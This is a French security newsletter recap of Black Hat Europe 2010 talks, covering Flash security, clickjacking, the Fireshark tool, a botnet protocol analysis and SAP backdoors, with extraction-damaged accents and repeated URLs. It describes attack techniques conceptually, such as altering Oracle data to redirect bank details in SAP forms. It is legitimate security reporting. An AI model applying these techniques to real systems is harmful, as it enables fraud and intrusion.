-Amit-Cyber-%5BCrime_War%5D-Connecting-the-dots-slides.pdfhttps://media.blackhat.com/bh-eu-10/presentations/Amit/BlackHat-EU-2010-Amit-Cyber-%5BCrime_War%5D-Connecting-the-dots-slides.pdfhttp://www.xmcopartners.comhttp://www.xmcopartners.com

Defending the poor - Felix Lindner

En parallle, un chercheur allemand, Felix FX Lindner, est venu prsenter le fruit de ses recherches sur la scurit des appl icat ions RIA (Rich Internet Application), notamment sur les composants Flash.

Ce projet fut initialis en 2008 par la German Federal Office for Information Security afin dtablir un tat de lart de la scurit des applications RIA.

Aprs avoir prsent le modle de scurit de la technolog ie Adobe F lash et les d i f frentes malversations possibles, le chercheur a relat lhistorique surprenant de lvolution du format de fichiers SWF : chaque nouvelle version apportant son nouveau lot de vulnrabilits. Comme le souligne

l ora teur, le p lus surprenant tant que pour des raisons de rtro-compatibil it, tous les formats SWF s o n t t o u j o u r s suppor ts pa r l e lecteur Flash (SWF 10 tant le format standard aujourdhui).

Afin de protger le commun des mortels contre les animations Flash malicieuses, Felix FX Lindner a publi un outil Open-Source: Blitzableiter

(http://blitzableiter.recurity.com/).

Cet outil permet de parser le fichier SWF, didentifier et de modifier un ventuel code malicieux et de gnrer un nouveau fichier SWF sain. Lobjectif tant de fournir court terme des modules pour les proxies, des navigateurs web ou autres filtres. Lauteur insiste tout particulirement sur le retour des utilisateurs pour laider dboguer et amliorer cet outil. En effet, les utilisateurs effectuent rarement des retours lorsque les outils sont open source

Slides :h t t p : / / w w w. r e c u r i t y - l a b s . c o m / c o n t e n t / p u b /DefendingThePoor_26C3.pdf

Security in depth for Linux software - Julien Tinnes et Chris Evans

Julien Tinnes, chercheur chez Google, a prsent un sujet relativement technique sur les diffrents concepts de la scurit du dveloppement de logiciels Linux.Aprs un rappel sur des principes de bases, cette confrence a permis de comprendre les erreurs de dveloppement les plus courantes et la faon de les viter pour assurer une scurit optimale des applications Linux.En dfinissant les diffrentes fonctions scurit et leurs implmentations possibles, Julien a dmontr qu'il tait possible d'amliorer les noyaux Linux de manire significative.

Whitepaper :https://media.Black Hat.com/bh-eu-10/whitepapers/Tinnes_Evans/Black Hat-EU-2010-Tinnes-Evans-Security-In-Linux-wp.pdf

Maltego unveiling 3.0 - Roelof Temmingh Depuis 2 ans, on retrouve la socit Paterva avec son logiciel Maltego. L'anne dernire, le logiciel avait t prsent de A Z. Pour rappel, Maltego permet en quelques clics de chercher les liens entre adresses IP, noms de domaine, emails, noms propres ou encore les documents lis un domaine spcifique.Cette fois-ci, la version 3.0 s'attaque aux rseaux sociaux en utilisant des modules bass sur le NER (Names Entity Recognition). Maltego se base sur deux logiciels spcialiss dans l'extraction d'informations partir de divers supports. Ainsi, partir d'un mot clef donn, Maltego va effectuer une recherche sur Internet (PDF, pages HTML, fichiers XML...) puis interroger les deux APIs des services OpenCalais et AlchemyAPI. Il les consolide afin d'extraire des informations sensibles de ces documents (noms, tlphones, institutions, pays...).La dmonstration tait assez parlante. partir de mots clefs tels que "Uranium enrichment", l'outil a rassembl un nombre impressionnant de documents et a pu dterminer les pays, les personnes ou les entits impliqus sur ce sujet.



LES CONFRENCES DU MOMENT : BLACK HAT EUROPE LACTU SCU N26

WWW.XMCOPA

RTN

ERS.COM

http://blitzableiter.recurity.com/http://blitzableiter.recurity.com/http://www.recurity-labs.com/content/pub/DefendingThePoor_26C3.pdfhttp://www.recurity-labs.com/content/pub/DefendingThePoor_26C3.pdfhttp://www.recurity-labs.com/content/pub/DefendingThePoor_26C3.pdfhttp://www.recurity-labs.com/content/pub/DefendingThePoor_26C3.pdfhttps://media.blackhat.com/bh-eu-10/whitepapers/Tinnes_Evans/BlackHat-EU-2010-Tinnes-Evans-Security-In-Linux-wp.pdfhttps://media.blackhat.com/bh-eu-10/whitepapers/Tinnes_Evans/BlackHat-EU-2010-Tinnes-Evans-Security-In-Linux-wp.pdfhttps://media.blackhat.com/bh-eu-10/whitepapers/Tinnes_Evans/BlackHat-EU-2010-Tinnes-Evans-Security-In-Linux-wp.pdfhttps://media.blackhat.com/bh-eu-10/whitepapers/Tinnes_Evans/BlackHat-EU-2010-Tinnes-Evans-Security-In-Linux-wp.pdfhttps://media.blackhat.com/bh-eu-10/whitepapers/Tinnes_Evans/BlackHat-EU-2010-Tinnes-Evans-Security-In-Linux-wp.pdfhttps://media.blackhat.com/bh-eu-10/whitepapers/Tinnes_Evans/BlackHat-EU-2010-Tinnes-Evans-Security-In-Linux-wp.pdfhttp://www.xmcopartners.comhttp://www.xmcopartners.com

Enfin, la prsentation s'est conclue sur une preuve de concept avec la corrlation entre ce module NER et l'utilisation de l'API Facebook pour identifier les liens entre les personnes.Une dmonstration a t mene partir du thme "Black Hat briefing". L'outil a pu rcuprer l'ensemble des sites web qui contenaient ce mot et extraire ensuite les personnes impliques. En utilisant l'API de Facebook, il a pu dterminer les connexions entre les personnes lies ce thme.

Whitepaper :https://media.Black Hat.com/bh-eu-10/whitepapers/Tinnes_Evans/Black Hat-EU-2010-Tinnes-Evans-Security-In-Linux-wp.pdf

Next Generation Clickjacking - Paul Stone

Le Clickjacking a fait beaucoup couler d'encre en 2008. Cette technique tire parti des calques HTML afin de camoufler des boutons derrire une page web l'apparence inoffensive. En cliquant sur un lien, l'utilisateur clique son insu sur un bouton cach qui ralisera une action malveillante (soumission de formulaire, activation de la webcam via Flash...).

Paul Stone a dmontr les nouvelles mthodes envisageables pour exploiter cette attaque de diffrentes faons (via du Drag and Drop). Ses dmonstrations, bien quamusantes ne nous ont pas convaincu... L'auteur a tout de mme dvelopp un outil permettant d'exploiter ce type d'attaque...

Click jacking Tool : http://www.contextis.co.uk/resources/tools/clickjacking-tool/

Slides :https://media.Black Hat.com/bh-eu-10/presentations/Stone/Black Hat-EU-2010-Stone-Next-Generation-Clickjacking-slides.pdf

Paul Stone a dmontr les nouvelles mthodes envisageables pour exploiter cette attaque de Clickjacking de diffrentes faons (notamment via du Drag and Drop). Ses dmonstrations, bien quamusantes ne nous ont pas convaincu...

Fireshark : - A tool to Link the Malicious Web - Stephan Chenette

Les injections d'iframe malveillantes ou l'exploitation de failles des navigateurs sont devenues un des vecteurs d'infection les plus en vogue. Les pirates compromettent des sites web et y insrent du code HTML/JavaScript qui redirigent les utilisateurs vers des sites qui proposent de tlcharger des malwares ou qui exploitent des vulnrabilits.Ces attaques reposent le plus souvent sur des codes JavaScript masqus, difficilement comprhensibles l'oeil nu. Plusieurs outils sont disponibles sur Internet afin de dcoder ces codes, mais aucun ne permettait de corrler les sites infects et les cibles des iframes en question. Stephan Chenette, de la socit WebSense, a donc dvelopp un plug-in pour Firefox permettant de soumettre automatiquement un site contenant un code cach vers un serveur central charg de corrler l'ensemble des sites infects et d'tablir des statistiques.

Lien :http://fireshark.org/

Protocol, Mechanism and Encryption of Pushdo/Cutwail/Webwail Botnet - Kyle Yang

Voici les traditionnelles analyses de malwares, ralises cette anne par Kyle Yang. L'auteur a tudi le protocole de chiffrement utilis par les nouvelles versions du virus Pushdo/Cutwail/Webwail. Des diffrents modules implments aux mthodes d'envoi de donnes jusqu' la rcupration de commandes, toutes les facettes de ce malware ont t prsentes.

Slides :https://media.Black Hat.com/bh-eu-10/presentations/Yang/Black Hat-EU-2010-Yang-Protocol-Botnets-slides.pdf

Whitepaper :https://media.Black Hat.com/bh-eu-10/source/Yang/Black Hat-EU-2010-Yang-Protocol-Botnets-source.7z.zip



LES CONFRENCES DU MOMENT : BLACK HAT EUROPE LACTU SCU N26

WWW.XMCOPA

RTN

ERS.COM

https://media.blackhat.com/bh-eu-10/whitepapers/Tinnes_Evans/BlackHat-EU-2010-Tinnes-Evans-Security-In-Linux-wp.pdfhttps://media.blackhat.com/bh-eu-10/whitepapers/Tinnes_Evans/BlackHat-EU-2010-Tinnes-Evans-Security-In-Linux-wp.pdfhttps://media.blackhat.com/bh-eu-10/whitepapers/Tinnes_Evans/BlackHat-EU-2010-Tinnes-Evans-Security-In-Linux-wp.pdfhttps://media.blackhat.com/bh-eu-10/whitepapers/Tinnes_Evans/BlackHat-EU-2010-Tinnes-Evans-Security-In-Linux-wp.pdfhttps://media.blackhat.com/bh-eu-10/whitepapers/Tinnes_Evans/BlackHat-EU-2010-Tinnes-Evans-Security-In-Linux-wp.pdfhttps://media.blackhat.com/bh-eu-10/whitepapers/Tinnes_Evans/BlackHat-EU-2010-Tinnes-Evans-Security-In-Linux-wp.pdfhttp://livepage.apple.com/http://livepage.apple.com/http://livepage.apple.com/http://livepage.apple.com/https://media.blackhat.com/bh-eu-10/presentations/Stone/BlackHat-EU-2010-Stone-Next-Generation-Clickjacking-slides.pdfhttps://media.blackhat.com/bh-eu-10/presentations/Stone/BlackHat-EU-2010-Stone-Next-Generation-Clickjacking-slides.pdfhttps://media.blackhat.com/bh-eu-10/presentations/Stone/BlackHat-EU-2010-Stone-Next-Generation-Clickjacking-slides.pdfhttps://media.blackhat.com/bh-eu-10/presentations/Stone/BlackHat-EU-2010-Stone-Next-Generation-Clickjacking-slides.pdfhttps://media.blackhat.com/bh-eu-10/presentations/Stone/BlackHat-EU-2010-Stone-Next-Generation-Clickjacking-slides.pdfhttps://media.blackhat.com/bh-eu-10/presentations/Stone/BlackHat-EU-2010-Stone-Next-Generation-Clickjacking-slides.pdfhttp://fireshark.orghttp://fireshark.orghttps://media.blackhat.com/bh-eu-10/presentations/Yang/BlackHat-EU-2010-Yang-Protocol-Botnets-slides.pdfhttps://media.blackhat.com/bh-eu-10/presentations/Yang/BlackHat-EU-2010-Yang-Protocol-Botnets-slides.pdfhttps://media.blackhat.com/bh-eu-10/presentations/Yang/BlackHat-EU-2010-Yang-Protocol-Botnets-slides.pdfhttps://media.blackhat.com/bh-eu-10/presentations/Yang/BlackHat-EU-2010-Yang-Protocol-Botnets-slides.pdfhttps://media.blackhat.com/bh-eu-10/presentations/Yang/BlackHat-EU-2010-Yang-Protocol-Botnets-slides.pdfhttps://media.blackhat.com/bh-eu-10/presentations/Yang/BlackHat-EU-2010-Yang-Protocol-Botnets-slides.pdfhttps://media.blackhat.com/bh-eu-10/source/Yang/BlackHat-EU-2010-Yang-Protocol-Botnets-source.7z.ziphttps://media.blackhat.com/bh-eu-10/source/Yang/BlackHat-EU-2010-Yang-Protocol-Botnets-source.7z.ziphttps://media.blackhat.com/bh-eu-10/source/Yang/BlackHat-EU-2010-Yang-Protocol-Botnets-source.7z.ziphttps://media.blackhat.com/bh-eu-10/source/Yang/BlackHat-EU-2010-Yang-Protocol-Botnets-source.7z.ziphttps://media.blackhat.com/bh-eu-10/source/Yang/BlackHat-EU-2010-Yang-Protocol-Botnets-source.7z.ziphttps://media.blackhat.com/bh-eu-10/source/Yang/BlackHat-EU-2010-Yang-Protocol-Botnets-source.7z.ziphttp://www.xmcopartners.comhttp://www.xmcopartners.com

SAP BACKDOOR Mariano Nuez Di Croce

Lan dernier, lorateur avait prsent les techniques dintrusion sur les environnements SAP ainsi que son outil SAPITO pour faciliter lexploitation de certaines vulnrabilits.

Cette anne, le chercheur a enrichi sa prsentation avec des techniques post-exploitation ou comment insrer une backdoor au sein de SAP. Le principal axe dattaque repose sur les bases de donnes Oracle. En effet, celles-ci contiennent souvent lensemble des donnes traites par lERP, mais galement lensemble du code source des applications SAP. Cest en modifiant certaines donnes Oracle ( base de requtes SQL INSERT ou UPDATE) que le chercheur a dmontr quil tait possible de modifier les formulaires des applications SAP.

Des dmonstrations live ont permis de modifier un formulaire de saisie de RIB ou comment remplacer tous les nouveaux RIB insrs par le